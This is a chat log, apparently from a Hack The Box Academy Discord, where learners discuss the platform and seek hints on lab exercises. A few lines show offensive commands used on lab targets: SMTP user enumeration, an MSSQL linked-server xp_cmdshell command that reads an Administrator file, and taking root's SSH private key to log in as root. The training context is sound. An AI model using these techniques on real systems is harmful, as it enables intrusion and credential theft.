then have the dozens of people that have completed it tell you why you're misunderstanding it ยฏ_(ใƒ„)_/ยฏ

tulip dragon
heavy edge
fathom pendant
#

ยฏ_(ใƒ„)_/ยฏ

tulip dragon
coral flare
#

Honestly, I am pretty high ranked in Tryhackme and I have been doing htb actively for the past 6 months and I am getting my ass kicked by the material on here but it's very high quality. I have yet to experience being wrongfully stuck at a box or module.

fathom pendant
#

(being high ranked on THM is a meme here)

coral flare
#

Had to learn that the hard way.

tulip dragon
heavy edge
#

THM needs to have an entire network that doesnt allow writeups and resets the vpn every 30m

#

then 1% means something

tulip dragon
#

true

coral flare
#

Tbf I think it is good way to start for total noobs and it did help me get more in the red-teaming even though I worked for 3+ years as cybersecurity consultant but it got clear pretty fast that I needed to switch to htb.

tulip dragon
#

i am 1 % i can say that it doesn't mean anyting

heavy edge
#

as of right now THM is for the ones who think 'del c:\windows\system32' is hacking imo

tulip dragon
#

in here i am stuck in 0 point cube question

heavy edge
fathom pendant
heavy edge
#

i enjoyed THM when i joined it, but its very hand holdy

coral flare
heavy edge
#

80% of the networks hold your hand and tell you where to look

tulip dragon
#

i have to say that 0 cube question is harder than other question

coral flare
#

You guys are killing me ๐Ÿ˜„ I literally said what you are now making fun of - that this platform is on a whole 'nother level in comparison.

heavy edge
#

what am i doing wrong here

echo wren
#

Ok, now I'll be petty....

"Same Origin Policy cannot prevent an attacker from changing the visibility of @goldenpeacock467's profile. Answer Format: Yes or No"

This isn't even a question, it's a statement. "Session Security" MODULE content is ok, but the questions or non-questions at the end of each SECTION, are lackluster at best.

next bronze
#

so you answer yes or no, what's wrong with that?

coral flare
heavy edge
#

its a T/F question w. Y/N

coral flare
#

If you don't like the platform just don't use it but please stop complaining about things which are absolutely fine.

heavy edge
#

spread security not hate my guy

cloud urchin
#

i enjoyed that module

heavy edge
#

which module?

cloud urchin
#

the session security one

next bronze
heavy edge
#

oh im stupid it targets 1 ip not the entire subnet

#

because that would take years

late moth
#

So I'm in the digital forensics module and on the skills assessment portion. Is the entire skill assessment done through velociraptor? I dont see any tools we used in the rest of the moduel on the target machine

#

I collected the artifacts with velociraptor, the disk image and the windows.memory.VAD artifacts, but stuck from there

signal laurel
#

Can someone DM about the hard skill assessment for Abusing HTTP misconfigurations. Im on the last step but its not working

dim wolf
#

you're stuck with velociraptor

late moth
#

the only thing they covered in the module with velociraptor was how to collect certain artifacts.. Well thanks for the direction to head at least

dim wolf
#

tool-operation wise

late moth
#

so you just have to manually sift through the artifacts with notepad or something?

#

or am i missing something

dim wolf
#

you certainly can't parse stuff like the memory or the MFT with notepad

#

you'll just have to think of another way to get the information you need

coral flare
#

๐Ÿ˜„

full nimbus
#

Hey is it me or the modules lab is real slow ?

coral flare
#

My pwnbox was really slow aswell yeah, switched to my vm.

full nimbus
#

I restarted VPN already, but takes like 1 second when I type sth

full nimbus
coral flare
#

Hm, no that's fine.

heavy edge
#

okay question

#

this makes it seem like you already have access to the windows host.

#

why would i need to portforward if download the exe on the segmented host

late moth
coral flare
heavy edge
#

ahhh so the pyload xfer would happen first, you get in then can portfwd to get access to the internal lan

#

that is segmented

heavy edge
#

that makes sense.

coral flare
#

Imagine connecting to some DMZ webserver for instance, you would pivot into the internal LAN like this bc it has 2 different NICs for instance.

heavy edge
#

okay liek a jump server and such.

coral flare
#

Never mind that that would be a terrible firewall config but yeah.

coral flare
heavy edge
#

youd use the jump host etc or whatever to get into the internal lan. when i did wreath i used sshuttle and chisel alot lol

#

so it makes more sense how htb is explaining it

coral flare
#

yeah, they are nice tools but ssh forwarding is really easy where applicable.

heavy edge
#

and showing the diagrams

coral flare
#

Yes ๐Ÿ™‚ have fun!

fathom pendant
heavy edge
#

i hear ligolo makes life great. i just need to learn it

coral flare
#

So anything that is not 100% needed will not be deployed.

#

That is the sad and unfun truth on real red-team engagements.

fathom pendant
north bramble
fathom pendant
coral flare
signal laurel
#

Can someone help me with the final step on HTTP Misconfigations Hard Skill assessment?

fathom pendant
#

have you also looked at the provided hint for the question

north bramble
# north bramble Hello frens. i am a bit stuck on this module https://academy.hackthebox.com/mod...
  • 0 Examine the target and find out the password of the user Will. Then, submit the password as the answer.

Sometimes, we will not have any initial credentials available, and as the last step, we will need to bruteforce the credentials to available services to get access. From other hosts on the network, our colleagues were able to identify the user "Kira", who in most cases had SSH access to other systems with the password "LoveYou1". We have already provided a prepared list of passwords in the "Resources" section for simplicity's purpose.

this is the hint

Now I have found Wills password, how do I proceed further

north bramble
fathom pendant
#

if you found Will's password : put that as the answer

coral flare
fathom pendant
#

^

north bramble
#

BROO

fathom pendant
coral flare
#

jesus @north bramble take a break, get some air. You're brain is washed. ๐Ÿ˜„

north bramble
#

WTF I DID THIS LIKE 6 hours back
IT SAID FIND ROOT PW

fathom pendant
#

nope; q clearly says Will

north bramble
fathom pendant
#

always has

#

reading the question helps you answer the question kek

north bramble
coral flare
# north bramble BRO I SWEAR 5 hours back it said find root from wills PW

A cognitive bias is a systematic pattern of deviation from norm or rationality in judgment. Individuals create their own "subjective reality" from their perception of the input. An individual's construction of reality, not the objective input, may dictate their behavior in the world. Thus, cognitive biases may sometimes lead to perceptual distor...

fathom pendant
#

it's literally the next section that has you use Will to find "root"

north bramble
#

I am soo stupid Sorry guys

fathom pendant
#

it happens

#

but I suggest taking a short break before continuing

north bramble
#

So sorry again to waste your time Ima read the other section and proceed

mint otter
#

what does ls -ltr do?

coral flare
#

@echo fractal or man ls

mint otter
#

thank you

dim wolf
frozen mesa
#

Linux privilege escalation --> logrotate , how to force the rotation?

heavy edge
#

ligolo makes it very easy

#

just using it is way easier than sshuttle or chisel

north bramble
fathom pendant
#

if you have the unshadow file: you're doing it right

#

otherwise gotta find a way to transfer the files back to your system

north bramble
#

Am I right?

#

Thanks frens

#

Okay cracked and got it thanks everyone

soft cedar
coral flare
heavy edge
#

oh

#

im using the -ng

#

i went straigh for ng kek

coral flare
#

Good!

coral flare
heavy edge
#

kek ive dissapointed him

shrewd hazel
#

whats the sqlmap parameter to just search all databases? i know how to do the current database --current-db

#

but how could i figure out the other databases there

#

nvm got it lol

fiery crag
#

Hey guys I am new here

#

Well I am from India is anyone also from India?

pastel niche
#

Is this the discord for the the trivia night??

fathom pendant
#

This isn't a gen chat, read and follow #welcome to access more of the server

pastel niche
#

Sorry to interrupt!

fathom pendant
#

I think it's already over

pastel niche
#

Shoot thatโ€™s right itโ€™s European time

#

Welp

fathom pendant
#

It started like an hour and a half ago

#

So yeah

shrewd hazel
#

keep getting weird outputs. funny enough the --dump does give me the full table with kims cracked password but how can i tailor the command to just dump kim's name and cracked password

fathom pendant
#

Also: spoilers dude

shrewd hazel
#

I dont want to exclude content that's needed for the question

#

It should be the name of the column lol did I miss that ๐Ÿ˜…

fathom pendant
#

ยฏ_(ใƒ„)_/ยฏ

#

But tbh if your command here gets or is close to the answer it can be a spoiler

leaden yew
#

When it comes to documenting and reporting findings, can each finding (ex: LFI) be associated with multiple systems in the report, OR should there be one finding for each system affected by the finding?

fathom pendant
#

Each system can have different implications for the finding

leaden yew
#

So there should be a single finding listed per affected system because the details of the finding can be different than the same finding for another affected system?

cursive shoal
#

can somone give me a hint with the attack vector for the skill assesment for the "SQLMap" module

leaden yew
cursive shoal
#

ive tested 3 post requests

next bronze
leaden yew
fathom pendant
#

^ it just depends

next bronze
#

there's no strictly the right way, write it in the way that it makes sense and meaningful to the customer

fathom pendant
#

Just be consistent

solar grove
#

Hello, I am stuck on the following question in the SMTP module in the FOOTPRINTING module:
Enumerate the SMTP service even further and find the username that exists on the system. Submit it as the answer.
my code is the following but I get several SUCC values and I tried them all in the answer section but it doesn't work, can you help me?

smtp-user-enum -m RCPT -U /usr/share/wordlists/metasploit/unix_users.txt 10.129.42.85 25

cursive shoal
#

can somone give me a hint with the attack vector for the skill assesment for the "SQLMap" module ive looked for post requests with a proxy and cant find a vulnerable one for the life of me

cloud urchin
solar grove
#

@cloud urchinI could not find there is no wordlist in the module

cloud urchin
#

CTRL+F and type resources

solar grove
cloud urchin
cloud urchin
#

awesome

potent thorn
#

Anyone able to help me with this part of the Linux PTT of the passsword attacks module?

i feel as though i;ve followed all the steps in the example but i still cant get it to work.

late moth
#

from the Digital Forensics final skill assessment. The question: Determine the registry key used for persistence and enter it as your answer. . I have gotten the windows.kapefiles.target artifacts which has all the registry hives. But I have no clue what to do next since the target machine has no tools except Velociraptor. I am not sure how to use Velociraptor to go about finding this information. Any tips or guidance?

potent thorn
# potent thorn

I just wanna know if im making a stupid mistake, is it asking me, once ive followed all the steps, to connect to //dc01/c$?

#

or another C drive? seems like a badly worded question to me

river glade
#

Hey

late moth
#

did you ever get a response to this?

rustic sage
#

can i dm a mod or htb staff please

fathom pendant
#

Why do you need to dm them?

rustic sage
fathom pendant
#

Then just dm a mod that's online

quasi jungle
#

https://academy.hackthebox.com/module/116/section/1468#questionsDiv
Managed to gain access to sqlcmd
Now enabled xp_cmdshell but when trying to read the flag

EXEC('EXECUTE AS LOGIN = ''john''; EXEC xp_cmdshell ''type C:\Users\Administrator\Desktop\flag.txt''') AT [LOCAL.TEST.LINKED.SRV]
2> GO
Msg 229, Level 14, State 5, Server WIN-HARD\SQLEXPRESS, Procedure xp_cmdshell, Line 1
The EXECUTE permission was denied on the object 'xp_cmdshell', database 'mssqlsystemresource', schema 'sys'.```
heavy edge
#

If this is hard lab, you need to do EXECUTE() at()

#

Thereโ€™s an example I believe of reading files remotely

fathom pendant
#

It's in the sql section

heavy edge
#

Oh

#

Ohhhhhhhhh okay I thought this was the lab

fathom pendant
#

The example you're talking of is in the sql section of that module

limber river
#

stupid question but just to make sure , in kerberos by keys we means password right
for example the TGT is protected with the KDC key, and the TGS ticket is protected with the service account key

heavy edge
cloud urchin
#

the keys can be derived from passwords or other means

limber river
clear orbit
#

Hello, Im on the getting started module and on the priv esc section I'm stuck on the last task. It is asking me to elevate my privs to root. Here's what I did. I went to /root/.ssh and was able to read id_rsa. I copied the contents, returned to my kali machine and made a file called key and pasted the key there. Then, I did chmod 600 key. After that, I try to ssh in by doing ssh user2@IP -i key -p 57170. But the problem is that it doesn't work and just asks for the password. I would appreciate any help

fathom pendant
#

Consider where you found it and what the goal is

clear orbit
#

And Iโ€™m trying to escalate my privileges

fathom pendant
#

/root/ isn't user2

clear orbit
#

So what user should I login as

#

Root?

fathom pendant
#

Yes

#

(Lowercase R)

#

/root/ is root's home, like how /home/user2 is user2's home

#

root is its own user, the super user

#

No

clear orbit
fathom pendant
#

I know what excersize they're doing

clear orbit
fathom pendant
#

I suggest doing the linux Fundamentals course

#

As this is bare minimum linux knowledge

fathom pendant
clear orbit
fathom pendant
#

If it was, it wouldn't be in /root/

rustic sage
#

hi poe ple

clear orbit
fathom pendant
#

(Not to mention if it was, you'd have been able to use it to log in as them)

valid viper
#

Hello, could someone please help me with the MSSQL module from Footprinting?

#

For the second question, I am unsure of how to show all databases...?

heavy edge
#

The command is in the section

valid viper
#

SQL> select name from sys.databases

#

?

heavy edge
#

Itโ€™s mssql i think the commands are different.

valid viper
#

That's what's in the lesson.

heavy edge
#

Oh

valid viper
#
SQL (ILF-SQL-01\backdoor  dbo@master)> 
fathom pendant
#

Depending what you're connecting with, sometimes it's dumb

#

Sqsh I've heard has issues

valid viper
fathom pendant
#

Try reinstalling it then?

#

Or try adding a ; at the end

valid viper
#

I'm running the script directly.

#

Same result w/semicolon.

fathom pendant
valid viper
#

It's on Github.

fathom pendant
#

From impacket

valid viper
#

Yes.

fathom pendant
#

I didn't encounter this issue so idk what to say to fix

heavy edge
#

Are you using the command or the string. Try /usr/xxx or where it is installed

#

Sometimes@the standalone commands from inpacket can have issues

fathom pendant
valid viper
#

I copied/pasted it from here.

fathom pendant
#

Ag

heavy edge
#

I know but Iโ€™ve been having issues with smb server and secrets dump@

fathom pendant
#

That would probably be why it's broken

heavy edge
#

So ive had to use the install path

valid viper
#

It should be installed on Parrot by default ๐Ÿ˜

fathom pendant
#

I believe it is

#

Or you can do pipx install impacket

valid viper
#

$impacket
bash: impacket: command not found

fathom pendant
#

Impacket isn't the command you goon

valid viper
#

pip3 install impacket
error: externally-managed-environment

fathom pendant
#

Add --break-system-packages

valid viper
#

pip3 install impacket --break-system-packages
Defaulting to user installation because normal site-packages is not writeable
Requirement already satisfied: impacket in /usr/lib/python3/dist-packages (0.11.0)
Requirement already satisfied: dsinternals in /usr/lib/python3/dist-packages (from impacket) (1.2.4)

heavy edge
#

Uninstall then re install

fathom pendant
#

Then it looks like the impacket suite is already installed

valid viper
#

Bah...how do I run it?

fathom pendant
#

You should be able to call it from anywhere

heavy edge
#

Pip3 uninstall impacket

fathom pendant
valid viper
#

Right, yeah I get it.

fathom pendant
#

Impacket has a bunch of tools

valid viper
#

pip3 uninstall impacket
error: externally-managed-environment

fathom pendant
#

Add --break-system-packages

valid viper
#

pip3 uninstall impacket --break-system-packages
Found existing installation: impacket 0.11.0
Not uninstalling impacket at /usr/lib/python3/dist-packages, outside environment /usr
Can't uninstall 'impacket'. No files were found to uninstall.

#

๐Ÿ˜

fathom pendant
#

It's installed systemwide

valid viper
#

Yes, and still won't run.

fathom pendant
#

So you'd likely need to use sudo

#

To uninstall

#

Or pipx

valid viper
#
Not uninstalling impacket at /usr/lib/python3/dist-packages, outside environment /usr
Can't uninstall 'impacket'. No files were found to uninstall.
WARNING: Running pip as the 'root' user can result in broken permissions and conflicting behaviour with the system package manager. It is recommended to use a virtual environment instead: https://pip.pypa.io/warnings/venv
fathom pendant
#

pip3 install pipx --break-system-packages

#

pipx uninstall impacket

valid viper
#

Req already satisfied for pipx...

#

pipx uninstall impacket
bash: pipx: command not found

cloud urchin
#

did you install impacket in docker? the error 'externally-managed-environment' indicates it may be managed outside of pip

valid viper
#

Possibly...but I haven't used it until now.

cloud urchin
#

well there ya go

valid viper
#

Okay, how do I fix it?

sinful drift
#

Hello, who else is this happening to that is not generating the target IP?

cloud urchin
#

idk what you're trying to fix

valid viper
#

I'm trying to run Impacket.

cloud urchin
valid viper
#

Or at least, the portion of it to connect to MSSQL.

cloud urchin
valid viper
#

python3 mssqlclient.py
python3: can't open file '/home/snow/Documents/mssqlclient.py': [Errno 2] No such file or directory

cloud urchin
#

your answer is right there in your error, that file doesn't exist in that location

ocean night
valid viper
#

Well I already downloaded the script and tried running it.

sinful drift
ocean night
#

Also which region are you working on?

valid viper
#

And the commands from the lesson are not working when I connect to the MSSQL server.

cloud urchin
ocean night
#

Which VPN server are you both on?

cloud urchin
#

i am on USWest

ocean night
#

US 1, 2 or 3?

cloud urchin
#

looks like 'us academy 2'

valid viper
#

Mine is working.

ocean night
#

ty

cloud urchin
#

man i just got a shell via logrotate too lol

cloud urchin